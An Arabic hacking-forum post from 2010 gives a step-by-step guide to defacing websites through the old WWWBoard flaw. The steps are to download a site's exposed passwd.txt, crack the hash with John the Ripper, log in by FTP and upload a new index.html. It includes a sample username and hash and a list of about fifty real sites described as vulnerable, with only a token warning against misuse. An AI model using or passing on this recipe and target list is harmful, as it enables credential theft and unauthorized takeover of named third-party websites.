عرض مشاركة واحدة
قديم 05-16-2010, 10:28 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
john elomari
 
الصورة الرمزية john elomari
 

 

 
إحصائية العضو






john elomari غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
john elomari is on a distinguished road

افتراضي إختراق المواقع عبر ثغرة


السلام عليكم

أولا وقبل كل شي أرجوا عدم استخدام الثغرة فيما يخل بالإسلام وفيما حرمه الله

الآن نبدأ الحديث هذه الثغرة الظاهر طرحت من قبل هنا

ولكنني أعيدها لانها محفوظة عندي من زمااااااان وأحببت أن تبقى الملكية لصاحبها
========================
ثغرة الـWWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو http://www.boardprep.net/
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان http://www.boardprep.net/wwwboard/passwd.txt
نفتح العنوان سوف تجد cknouse:aexMVWnDOyrdE
كلمة المرور:إسم المستخدم
يعني إسم المستخدم هو cknouse
وكلمة المرور هيaexMVWnDOyrdE
فك تشفيره بجون ذي ريبر
الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com
ملاحظة إستبدل domen.com بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسس وإدخل على الموقع أنشئ صفحة بإسم index.html
وإرفعها للموقع
لتحميل الفتب
http://www.motken.com/dawnload/porogram/wsftppro.zip

للتطبيق

هذه مواقع مصابة بالثغرة
http://kidlink.sunet.se/rti/irc/wwwboard/passwd.txt
http://www.hillsidespca.com/wwwboard/passwd.txt
http://www.lionnet.org.tr/118u/wwwboard/passwd.txt
http://www.cytoskeleton.com/wwwboard/passwd.txt
http://www.locon.org/wwwboard/passwd.txt
http://www.kcftoa.org/hazmat/wwwboard/passwd.txt
http://www.wgbhalumni.org/wwwboard/passwd.txt
http://www.creative-design.de/kmt/wwwboard/passwd.txt
http://www.kaapeli.fi/~hekata/wwwboard/passwd.txt
http://www.wbref.ch/wwwboard/passwd.txt
http://www.fys.ku.dk/~voss/utopia/wwwboard/passwd.txt
http://www.awdansey.co.uk/wwwboard/passwd.txt
http://www.mpset.com/wwwboard/passwd.txt
http://www.selectfire.com/wwwboard/passwd.txt
http://www.climbnh.com/wwwboard/passwd.txt
http://cwww.com/wwwboard/passwd.txt
http://sitemanager.hypermart.net/wwwboard/passwd.txt
http://www.foxsden.org/psf/FFE/wwwboard/passwd.txt
http://www.notam.com/forum/passwd.txt
http://www.sandiego.edu/~deroche/group4p/passwd.txt
http://www.sandiego.edu/~deroche/case7/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://indianlake.com/cgibin/passwd.txt
http://www.swe.org/SWE/Convention/den01/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://dykesworld.de/Boards/sistah/passwd.txt
http://www.public.iastate.edu/~n2ddg/IE565/passwd.txt
http://www.ycgroup.com/board/passwd.txt
http://www.doc.ic.ac.uk/~ipa98/jondon/passwd.txthttp://www.defenders.by.ru/texts/unix/unix-passwd.txt
http://www.public.iastate.edu/~benco/oclub/passwd.txt
http://www.ycgroup.com/board/passwd.txt
http://www.unionmen.com/forum/passwd.txt
http://facyt.uc.edu.ve/foros/passwd.txt
http://www.ku.edu/~philos/courses/wwwboard3/passwd.txt
http://ponce.inter.edu/forums/passwd.txt
http://students.washington.edu/msa/c...lum/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://www.motosalvagedirectory.com/forums/passwd.txt
http://www.mexconnect.com/liveboard/passwd.txt
http://www.inece.org/ozone/passwd.txt
http://cds.unina.it/~tuccillo/passwd.txt
http://ponce.inter.edu/forums/prueba/passwd.txt
http://paradigm-dc.hypermart.net/passwd.txt
http://clonetheory.virtualave.net/passwd.txt
http://www.uni-ulm.de/LiLL/foren/forum1/passwd.txt
http://www.artintheschool.org/forum/passwd.txt
http://www.mag7.net/floor/passwd.txt
http://www.urban-forestry.com/forum/passwd.txt

الله يا كثرها فك التشفير واشتغل

بس تراها تأخذ وقت طويييييل احيانا في فك التشفير

واذا كان عندك موقع تبي تتأكد أنه مصاب بالثغرة أو لا

تفضل هذا الموقع فهو يعطيك بيانات عن الموقع

http://www.netcraft.com




Yojvhr hgl,hru ufv eyvm

التوقيع

الله أكبر

الله أكبر

لا إله إلا آلله

وحده لا شريك له له الملك و له الحمد

الله م رحمنا وإرحم والدينا

أمين يا رب العالمين


أنا المغربي

و

أفتخر


http://i41.tinypic.com/2805dno.jpg

 

   

رد مع اقتباس